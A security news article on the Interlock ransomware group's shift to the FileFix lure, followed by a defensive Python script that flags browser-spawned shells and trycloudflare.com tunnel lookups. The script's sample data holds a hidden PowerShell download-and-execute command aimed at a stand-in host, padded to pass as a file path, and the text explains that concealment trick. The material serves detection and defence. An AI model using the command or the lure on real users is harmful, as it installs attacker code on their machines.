The Interlock ransomware group has changed how it delivers its malware, adopting the FileFix technique, a variation on ClickFix social engineering. Both methods talk the victim into running an attacker-supplied command themselves; FileFix does it through the Windows File Explorer address bar rather than a terminal or the Run dialog, and in Interlock's case the command installs a remote access trojan (RAT).
The Rise of ClickFix: Setting the Stage for FileFix
To understand why FileFix matters, it helps to look at its predecessor. According to ESET security researchers, ClickFix attacks increased by 517% between the second half of 2024 and the first half of 2025, making it one of the most common initial access vectors among cybercriminals. These attacks lure victims to a fraudulent website and talk them into copying a command from the page and running it themselves, typically in PowerShell.
A typical ClickFix page shows a fake error message (a browser that supposedly cannot render the page) or a fake CAPTCHA, and presents the command as the "fix" or the "verification" step. The technique first targeted Windows users, but security researchers have since documented campaigns aimed at macOS and Linux as well, so the lure is not tied to one platform.
FileFix Technique: A More Deceptive Approach
The FileFix technique, recently documented by security researcher mr.d0x, is a refinement of the same idea. Where ClickFix asks the victim to open the Run dialog or a terminal, steps that may raise suspicion, FileFix uses the familiar File Explorer address bar, which accepts and runs commands just as the Run dialog does, so the victim believes they are only looking for a file.
The lure is a webpage that claims to be sharing a specific file. The page shows a file path and instructs the victim to paste it into File Explorer to open the file. An "Open Explorer" button opens a File Explorer window (in mr.d0x's proof of concept, the browser's file-upload dialog) and at the same time writes a PowerShell command, not a path, to the clipboard. In the proof of concept the command is followed by a long run of spaces and then a PowerShell comment containing the advertised path, so that only the path is visible in the address bar once the clipboard contents are pasted. When the victim presses Enter, Explorer executes the command.
Interlock RAT Distribution Through Advanced Infrastructure
Security researchers from The DFIR Report and Proofpoint identified Interlock RAT being distributed through KongTuke (also tracked as LandUpdate808), a Traffic Distribution System (TDS), as early as May 2025. The multi-stage chain initially relied on ClickFix and fake CAPTCHA pages to get the payload run.
By June the operators had switched to FileFix, delivering a PHP variant of Interlock RAT. This is the first publicly documented use of FileFix in an active campaign. Some campaigns also deploy a Node.js version of the malware.
Interlock RAT Capabilities and Operational Behavior
Once running, the RAT profiles the host with PowerShell commands and sends the results to its operators. It checks what privileges it is running with, sets up persistence, and then waits for tasking from its command-and-control (C2) server.
The analysis shows hands-on-keyboard operation rather than automation: the operators were observed checking for backups, browsing local directories, and enumerating domain controllers. In several documented cases they moved laterally over RDP, which points to a crew with established post-exploitation tradecraft.
Legitimate Services Exploitation for Stealth Operations
Notably, Interlock RAT's C2 sits behind trycloudflare.com: the operators front their server with a free Cloudflare quick tunnel, so the implant talks over HTTPS to a Cloudflare-owned domain and the real C2 host is never exposed. Domain-reputation blocking does little against this, because the domain is legitimate and widely used by developers; the useful signal is a workstation resolving or connecting to a *.trycloudflare.com name it has never used before, especially shortly after a shell was launched from a browser or Explorer window.
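The two observable artifacts described above, a shell spawned from an Explorer or browser window with the padded fake-path comment, and a subsequent DNS lookup of a trycloudflare.com tunnel name, can be correlated in triage. The following is an added example, not code from the page nor from The DFIR Report, Proofpoint or mr.d0x. It assumes Sysmon-style process-creation fields (ParentImage, Image, CommandLine), a set of browser parents plus explorer.exe (an assumption generalised from the proof of concept, where the file dialog belongs to the browser process), the padded-comment lure shape from mr.d0x's write-up, and a ten-minute correlation window; all events, hostnames and domain names are constructed.

```python
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumed parent set: browsers (the file dialog belongs to the browser process
# in the FileFix proof of concept) plus explorer.exe for a standalone window.
INTERACTIVE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "explorer.exe"}
# Lure shape: command, a long run of spaces, then a PowerShell comment holding
# a plausible Windows path so that only the path shows in the address bar.
PADDED_FAKE_PATH = re.compile(r"\S\s{8,}#\s*[A-Za-z]:\\\S")
# Quick tunnels are subdomains of trycloudflare.com; the apex itself is not one.
TUNNEL_HOST = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)*\.trycloudflare\.com\.?$", re.I)

# Constructed Sysmon-style process-creation records (not real telemetry).
PROCESS_EVENTS = [
    {"time": "2025-06-10T14:02:11", "host": "WS-0412",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w h -c "iwr https://lure.example.invalid/s|iex"'
                    + " " * 120 + r"# C:\company\Internal-Secure\Report_Q2.pdf"},
    {"time": "2025-06-10T09:15:00", "host": "WS-0099",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},  # an admin opening a shell; benign shape
    {"time": "2025-06-10T14:20:05", "host": "WS-0200",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
]
# Constructed DNS log lines: "<time> <host> <qtype> <query>".
DNS_LOG = [
    "2025-06-10T14:02:40 WS-0412 A quiet-harbor-lantern-moss.trycloudflare.com",
    "2025-06-10T14:02:41 WS-0412 A cdn.example.invalid",
    "2025-06-10T11:30:00 WS-0099 A wide-paper-orbit-dune.trycloudflare.com",
    "2025-06-10T14:21:00 WS-0200 A trycloudflare.com",
]


def _name(path):
    return PureWindowsPath(path).name.lower()


def score_process(ev):
    """Return (severity, reason) for a FileFix-shaped shell launch, else None."""
    child, parent = _name(ev["Image"]), _name(ev["ParentImage"])
    if child not in SHELLS or parent not in INTERACTIVE_PARENTS:
        return None
    padded = bool(PADDED_FAKE_PATH.search(ev.get("CommandLine", "")))
    if padded:
        return ("high", f"{child} from {parent} with padded fake-path comment")
    if parent != "explorer.exe":
        return ("medium", f"{child} spawned by browser {parent}")
    return None  # explorer.exe -> shell without the lure shape is everyday activity


def tunnel_lookups(lines):
    """Return (time, host, fqdn) for every query to a trycloudflare.com subdomain."""
    out = []
    for line in lines:
        time, host, _qtype, query = line.split()
        if TUNNEL_HOST.match(query):
            out.append((datetime.fromisoformat(time), host, query.rstrip(".").lower()))
    return out


def correlate(events, dns_lines, window=timedelta(minutes=10)):
    """Raise a process finding to critical when the same host resolves a
    trycloudflare.com tunnel name within `window` after the shell launch."""
    lookups = tunnel_lookups(dns_lines)
    findings = []
    for ev in events:
        scored = score_process(ev)
        if not scored:
            continue
        severity, reason = scored
        t0 = datetime.fromisoformat(ev["time"])
        hits = [fqdn for (t, host, fqdn) in lookups
                if host == ev["host"] and t0 <= t <= t0 + window]
        if hits:
            severity, reason = "critical", f"{reason}; tunnel lookup {hits[0]}"
        findings.append({"host": ev["host"], "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in correlate(PROCESS_EVENTS, DNS_LOG):
        print(f["severity"].upper(), f["host"], f["reason"])
```

On the sample data WS-0412 is raised to critical (browser-spawned PowerShell with the padded comment, then a tunnel lookup 29 seconds later), WS-0200 stays at medium (Edge spawning cmd.exe, but the only trycloudflare.com query is the apex, not a tunnel), and WS-0099 produces nothing from the process side even though it has a tunnel lookup on its own. A real deployment would also alert on that lone lookup at lower priority, and should expect some benign developer traffic to quick tunnels, which is why this example treats the domain as a correlation signal rather than a block-list entry.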
FileFix shows how quickly social engineering lures are refined once one variant starts working. On the human side, training should give users a simple rule: a webpage that asks you to paste something into the Run dialog, a terminal, or the File Explorer address bar is attacking you, whatever file or fix it promises. On the technical side, defenders should monitor for command shells spawned by browsers or explorer.exe, watch for new connections to trycloudflare.com tunnel names, and keep detection content current, since the lure will change again before the underlying trick does.